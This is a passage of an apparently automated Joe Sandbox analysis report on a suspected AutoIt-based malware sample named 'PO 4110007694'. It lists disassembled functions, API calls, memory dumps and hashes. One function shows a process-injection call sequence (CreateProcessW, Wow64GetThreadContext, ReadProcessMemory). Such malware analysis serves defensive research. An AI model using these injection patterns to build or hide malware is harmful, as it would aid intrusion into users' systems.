                                                                      • Part of subcall function 00C30162: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00C30193
                                                                      • Part of subcall function 00C30162: MapVirtualKeyW.USER32(00000010,00000000), ref: 00C3019B
                                                                      • Part of subcall function 00C30162: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00C301A6
                                                                      • Part of subcall function 00C30162: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00C301B1
                                                                      • Part of subcall function 00C30162: MapVirtualKeyW.USER32(00000011,00000000), ref: 00C301B9
                                                                      • Part of subcall function 00C30162: MapVirtualKeyW.USER32(00000012,00000000), ref: 00C301C1
                                                                      • Part of subcall function 00C260F9: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,00C1F930), ref: 00C26154
                                                                    • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00C1F9CD
                                                                    • OleInitialize.OLE32(00000000), ref: 00C1FA4A
                                                                    • CloseHandle.KERNEL32(00000000), ref: 00C545C8
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                    • String ID:
                                                                    • API String ID: 1986988660-0
                                                                    • Opcode ID: cdcf89053db44e91782c63409588f464c055304dfc6184410db41701d8511e8b
                                                                    • Instruction ID: 0f8b2d28b3eedc9ed113f58b404fd58c70c84a0b9f1bd09725bd2b41156cf6ab
                                                                    • Opcode Fuzzy Hash: cdcf89053db44e91782c63409588f464c055304dfc6184410db41701d8511e8b
                                                                    • Instruction Fuzzy Hash: 3A819AB0916A40CFC784EF39A94476D7BE5FB893067A0812FE519CB372EB7044859F12
                                                                    Function 00C1434A Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • _memset.LIBCMT ref: 00C14370
                                                                    • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00C14415
                                                                    • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00C14432
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: IconNotifyShell_$_memset
                                                                    • String ID:
                                                                    • API String ID: 1505330794-0
                                                                    • Opcode ID: 8ecbddad9946978e68382ff40ba3e05109a44cdd734d38b798259d4ea4212df3
                                                                    • Instruction ID: 38982c91bd16b678f2787cb5395f5222340a892a1f07a4f73a10dca61d62a9ed
                                                                    • Opcode Fuzzy Hash: 8ecbddad9946978e68382ff40ba3e05109a44cdd734d38b798259d4ea4212df3
                                                                    • Instruction Fuzzy Hash: DB316FB05057019FD725DF24D8847DBBBF8FB49309F00092EF5AAC2251E771AA88DB52
                                                                    Function 00C3571C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __FF_MSGBANNER.LIBCMT ref: 00C35733
                                                                      • Part of subcall function 00C3A16B: __NMSG_WRITE.LIBCMT ref: 00C3A192
                                                                      • Part of subcall function 00C3A16B: __NMSG_WRITE.LIBCMT ref: 00C3A19C
                                                                    • __NMSG_WRITE.LIBCMT ref: 00C3573A
                                                                      • Part of subcall function 00C3A1C8: GetModuleFileNameW.KERNEL32(00000000,00CD33BA,00000104,?,00000001,00000000), ref: 00C3A25A
                                                                      • Part of subcall function 00C3A1C8: ___crtMessageBoxW.LIBCMT ref: 00C3A308
                                                                      • Part of subcall function 00C3309F: ___crtCorExitProcess.LIBCMT ref: 00C330A5
                                                                      • Part of subcall function 00C3309F: ExitProcess.KERNEL32 ref: 00C330AE
                                                                      • Part of subcall function 00C38B28: __getptd_noexit.LIBCMT ref: 00C38B28
                                                                    • RtlAllocateHeap.NTDLL(017A0000,00000000,00000001,00000000,?,?,?,00C30DD3,?), ref: 00C3575F
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                                    • String ID:
                                                                    • API String ID: 1372826849-0
                                                                    • Opcode ID: 7fb8641d0046934611834dfc22349457397cc0b1595c6c8c436bc981e2a7c5cd
                                                                    • Instruction ID: f7bbf1e3de705a91ac110aba160e4e12deb66471a63e3cd3f7190bd0755cb05b
                                                                    • Opcode Fuzzy Hash: 7fb8641d0046934611834dfc22349457397cc0b1595c6c8c436bc981e2a7c5cd
                                                                    • Instruction Fuzzy Hash: 8D01D475271B42DBD6113739EC86B2E73889F83762F10053AF815EB1E2DEB09E016A61
                                                                    Function 00C798A2 Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00C79548,?,?,?,?,?,00000004), ref: 00C798BB
                                                                    • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00C79548,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 00C798D1
                                                                    • CloseHandle.KERNEL32(00000000,?,00C79548,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00C798D8
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: File$CloseCreateHandleTime
                                                                    • String ID:
                                                                    • API String ID: 3397143404-0
                                                                    • Opcode ID: b04d17592822e8ceb639015ba5c78fa17fbb363b0c94f404b61fed70e36f918d
                                                                    • Instruction ID: c6511e26d66413eac8e88f0dc0515691432723c2121723d1aaee7c11e8d0a832
                                                                    • Opcode Fuzzy Hash: b04d17592822e8ceb639015ba5c78fa17fbb363b0c94f404b61fed70e36f918d
                                                                    • Instruction Fuzzy Hash: 9CE08632140214B7EB211B64EC0EFDE7B19EB06760F108125FB24A90F087B1562297D8
                                                                    Function 00C78D0D Relevance: 4.5, APIs: 3, Instructions: 22COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • _free.LIBCMT ref: 00C78D1B
                                                                      • Part of subcall function 00C32D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00C39A24), ref: 00C32D69
                                                                      • Part of subcall function 00C32D55: GetLastError.KERNEL32(00000000,?,00C39A24), ref: 00C32D7B
                                                                    • _free.LIBCMT ref: 00C78D2C
                                                                    • _free.LIBCMT ref: 00C78D3E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                    • String ID:
                                                                    • API String ID: 776569668-0
                                                                    • Opcode ID: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
                                                                    • Instruction ID: c633dbf315a95d57c0d43ffc37f79d539e478ce928b7708461c737af82590984
                                                                    • Opcode Fuzzy Hash: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
                                                                    • Instruction Fuzzy Hash: 9CE012B165160246CF34A678AD48A9313DC4F68352B24491DB62DD7186DF64F946D124
                                                                    Function 00C1A9C3 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 534COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: CALL
                                                                    • API String ID: 0-4196123274
                                                                    • Opcode ID: e86a1ab2cad60d705efbd3434238ad8616a8604d6cd202e3c1c17213daba45c4
                                                                    • Instruction ID: 12685adb9c783136b3a7e84846a99a60ef1b58e02ab48d23f91a37738fe2de23
                                                                    • Opcode Fuzzy Hash: e86a1ab2cad60d705efbd3434238ad8616a8604d6cd202e3c1c17213daba45c4
                                                                    • Instruction Fuzzy Hash: C6224974509201DFC724DF14C494BAABBE1FF86314F14896DE89A8B361D731ED85EB82
                                                                    Function 00C14C70 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 141COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: _memmove
                                                                    • String ID: EA06
                                                                    • API String ID: 4104443479-3962188686
                                                                    • Opcode ID: 585617cc813441ffd31bea4c1c30f195047962205ab1aa00bda48f25686db5e8
                                                                    • Instruction ID: 9437a3ad685653456a2aacd7b9f928fd3cf1713ff8512d5ad18d5ee36132186c
                                                                    • Opcode Fuzzy Hash: 585617cc813441ffd31bea4c1c30f195047962205ab1aa00bda48f25686db5e8
                                                                    • Instruction Fuzzy Hash: B6414F71A0415857DF196B64E861BFE7FA29F47300F684475EC829B282D6309EC5B3A1
                                                                    Function 00C17A51 Relevance: 3.1, APIs: 2, Instructions: 97COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: _memmove
                                                                    • String ID:
                                                                    • API String ID: 4104443479-0
                                                                    • Opcode ID: 80b40dc59eff670f7c44fd7edcc2cf2316980d5bc59dda85bf8bc9441f819d6d
                                                                    • Instruction ID: 78a7a8686e94218b6a9c7aa40a52122ad0b49b5075774356b121f27de1fd6ffd
                                                                    • Opcode Fuzzy Hash: 80b40dc59eff670f7c44fd7edcc2cf2316980d5bc59dda85bf8bc9441f819d6d
                                                                    • Instruction Fuzzy Hash: FC3187B2604506AFC704DF69C8D1DA9B3B9FF49310B158729E529CB291EB30E950EB90
                                                                    Function 00C147D0 Relevance: 3.1, APIs: 2, Instructions: 59COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • IsThemeActive.UXTHEME ref: 00C14834
                                                                      • Part of subcall function 00C3336C: __lock.LIBCMT ref: 00C33372
                                                                      • Part of subcall function 00C3336C: DecodePointer.KERNEL32(00000001,?,00C14849,00C67C74), ref: 00C3337E
                                                                      • Part of subcall function 00C3336C: EncodePointer.KERNEL32(?,?,00C14849,00C67C74), ref: 00C33389
                                                                      • Part of subcall function 00C148FD: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00C14915
                                                                      • Part of subcall function 00C148FD: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00C1492A
                                                                      • Part of subcall function 00C13B3A: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00C13B68
                                                                      • Part of subcall function 00C13B3A: IsDebuggerPresent.KERNEL32 ref: 00C13B7A
                                                                      • Part of subcall function 00C13B3A: GetFullPathNameW.KERNEL32(00007FFF,?,?,00CD52F8,00CD52E0,?,?), ref: 00C13BEB
                                                                      • Part of subcall function 00C13B3A: SetCurrentDirectoryW.KERNEL32(?), ref: 00C13C6F
                                                                    • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00C14874
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                                                    • String ID:
                                                                    • API String ID: 1438897964-0
                                                                    • Opcode ID: a1fae390ba68466046658ee00300ae0af7375f70caf63a05e6591be656431c03
                                                                    • Instruction ID: 50aaf9b64047f2b17b82387c88f5aeb18ec357ad2c701ffd3c16336f1a695e0d
                                                                    • Opcode Fuzzy Hash: a1fae390ba68466046658ee00300ae0af7375f70caf63a05e6591be656431c03
                                                                    • Instruction Fuzzy Hash: E5119D719093419FD700EF69D845B4EBBE8EF8A750F10891FF040872B1DB70968ADB92
                                                                    Function 00C30DB6 Relevance: 3.0, APIs: 2, Instructions: 44COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00C3571C: __FF_MSGBANNER.LIBCMT ref: 00C35733
                                                                      • Part of subcall function 00C3571C: __NMSG_WRITE.LIBCMT ref: 00C3573A
                                                                      • Part of subcall function 00C3571C: RtlAllocateHeap.NTDLL(017A0000,00000000,00000001,00000000,?,?,?,00C30DD3,?), ref: 00C3575F
                                                                    • std::exception::exception.LIBCMT ref: 00C30DEC
                                                                    • __CxxThrowException@8.LIBCMT ref: 00C30E01
                                                                      • Part of subcall function 00C3859B: RaiseException.KERNEL32(?,?,?,00CC9E78,00000000,?,?,?,?,00C30E06,?,00CC9E78,?,00000001), ref: 00C385F0
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                    • String ID:
                                                                    • API String ID: 3902256705-0
                                                                    • Opcode ID: e16ff6c3886353847f4bfe7e615d01b7e3f3d99350c26481cd71e8355b490bf3
                                                                    • Instruction ID: 58913e5cdad045ee2690a6c7b28b59a44554e83ceaaf1812a037b95aeee50770
                                                                    • Opcode Fuzzy Hash: e16ff6c3886353847f4bfe7e615d01b7e3f3d99350c26481cd71e8355b490bf3
                                                                    • Instruction Fuzzy Hash: 0EF0F47292032A66CB10BAD8EC21ADE77AC9F01310F200429F814A6982DF709A44E6D1
                                                                    Function 00C353A6 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00C38B28: __getptd_noexit.LIBCMT ref: 00C38B28
                                                                    • __lock_file.LIBCMT ref: 00C353EB
                                                                      • Part of subcall function 00C36C11: __lock.LIBCMT ref: 00C36C34
                                                                    • __fclose_nolock.LIBCMT ref: 00C353F6
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                    • String ID:
                                                                    • API String ID: 2800547568-0
                                                                    • Opcode ID: e2ec56a3f680ba84f0757a486652d14061a503e910bb40155efdb5ace79bc0ab
                                                                    • Instruction ID: 3960019e39b15c06c909e5a40bec9fb2e2d3d14fb83b3d86562c25202ba2d5a9
                                                                    • Opcode Fuzzy Hash: e2ec56a3f680ba84f0757a486652d14061a503e910bb40155efdb5ace79bc0ab
                                                                    • Instruction Fuzzy Hash: 8CF0B471921B059ADB51BF7598067AD7BE06F41374F218208F424AB1D1CFFC8A45BB92
                                                                    Function 017DFF8D Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CreateProcessW.KERNELBASE(?,00000000), ref: 017E074B
                                                                    • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 017E07E1
                                                                    • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 017E0803
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656450001.00000000017DE000.00000040.00000020.00020000.00000000.sdmp, Offset: 017DE000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_17de000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                    • String ID:
                                                                    • API String ID: 2438371351-0
                                                                    • Opcode ID: 6ff7500a3617197a005732162d507dd4d37460c8dcbf147a4ae2be43d63b6423
                                                                    • Instruction ID: b19c9788d8a3728b77f3af3be87db937148144e4dcf650442080c81684990c0e
                                                                    • Opcode Fuzzy Hash: 6ff7500a3617197a005732162d507dd4d37460c8dcbf147a4ae2be43d63b6423
                                                                    • Instruction Fuzzy Hash: 2212EE20E14658C6EB24DF64D8547DEB272EF68300F1090E9910DEB7A5E77A4F81CF5A
                                                                    Function 00C30C08 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: ProtectVirtual
                                                                    • String ID:
                                                                    • API String ID: 544645111-0
                                                                    • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                    • Instruction ID: c9e434a9bf51fce6fca1837675821fd9ad70eb7ab6121c14a4a02ea16ed68fd2
                                                                    • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                    • Instruction Fuzzy Hash: D631F572A101059BC718DF49E4A4A69F7A6FB49300F3497A5E81ACB351D731EEC1DBC2
                                                                    Function 00C4FCAC Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: ClearVariant
                                                                    • String ID:
                                                                    • API String ID: 1473721057-0
                                                                    • Opcode ID: 32654e8e223ec2b0fc40754f7234f47fe5e642f72a0e0da4af635a0c006f1ab9
                                                                    • Instruction ID: dc6bedd5eeeed327161b760885b9beaee7be345db65bb8d4f4cec627542c005f
                                                                    • Opcode Fuzzy Hash: 32654e8e223ec2b0fc40754f7234f47fe5e642f72a0e0da4af635a0c006f1ab9
                                                                    • Instruction Fuzzy Hash: 134138746043519FDB14DF14C458B5ABBE1BF45318F1988ACE8998B362C332ED86DF52
                                                                    Function 00C17B53 Relevance: 1.6, APIs: 1, Instructions: 84COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: _memmove
                                                                    • String ID:
                                                                    • API String ID: 4104443479-0
                                                                    • Opcode ID: 5ba47d0481b39388d5f2befa68b63e57e09a831b645a1747ed48a723a150ccaf
                                                                    • Instruction ID: 358ae06971d4c72ee0d32267ea9b702c7b51af7787f5507977f986c9fa0821e0
                                                                    • Opcode Fuzzy Hash: 5ba47d0481b39388d5f2befa68b63e57e09a831b645a1747ed48a723a150ccaf
                                                                    • Instruction Fuzzy Hash: F5213A72A08A09EBDB148F56EC81BAD7BB4FF14351F32856DE886C5190EB30D5D0E745
                                                                    Function 00C14DDD Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00C14BB5: FreeLibrary.KERNEL32(00000000,?), ref: 00C14BEF
                                                                      • Part of subcall function 00C3525B: __wfsopen.LIBCMT ref: 00C35266
                                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00CD52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00C14E0F
                                                                      • Part of subcall function 00C14B6A: FreeLibrary.KERNEL32(00000000), ref: 00C14BA4
                                                                      • Part of subcall function 00C14C70: _memmove.LIBCMT ref: 00C14CBA
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
